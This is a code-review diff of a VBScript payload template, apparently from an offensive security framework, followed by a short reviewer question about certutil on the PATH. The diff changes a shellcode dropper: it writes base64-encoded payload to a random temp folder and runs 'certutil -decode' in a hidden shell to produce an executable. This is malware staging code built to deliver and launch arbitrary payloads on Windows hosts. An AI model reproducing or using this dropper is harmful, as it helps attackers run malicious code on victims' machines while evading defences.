data/templates/scripts/to_exe.vbs.template

```diff
@@ -1,26 +1,27 @@
 Function %{var_func}()
-	%{var_shellcode} = "%{hex_shellcode}"
+	%{var_shellcode} = "%{base64_shellcode}"
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
 	Dim %{var_stream}
 	Dim %{var_tempdir}
-	Dim %{var_tempexe}
+	Dim %{var_tempbase64}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
-	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	For i = 1 to Len(%{var_shellcode}) Step 2
-	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
-	Next
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
+	%{var_stream}.Write %{var_shellcode}
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
```

Comment:
Can you confirm that `certutil` is always in the `%PATH%`? Or should steps be taken to ensure that the exe is located?